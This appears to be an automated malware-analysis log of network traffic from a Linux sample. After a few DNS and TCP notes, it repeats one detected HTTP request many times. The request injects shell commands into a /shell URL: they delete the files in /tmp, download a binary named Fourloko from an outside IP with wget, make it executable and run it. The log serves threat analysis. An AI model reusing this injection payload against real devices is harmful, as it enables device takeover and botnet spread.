Source: unknown TCP traffic detected without corresponding DNS query: 88.240.92.22
Source: syslog.284.dr String found in binary or memory: https://www.rsyslog.com
Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
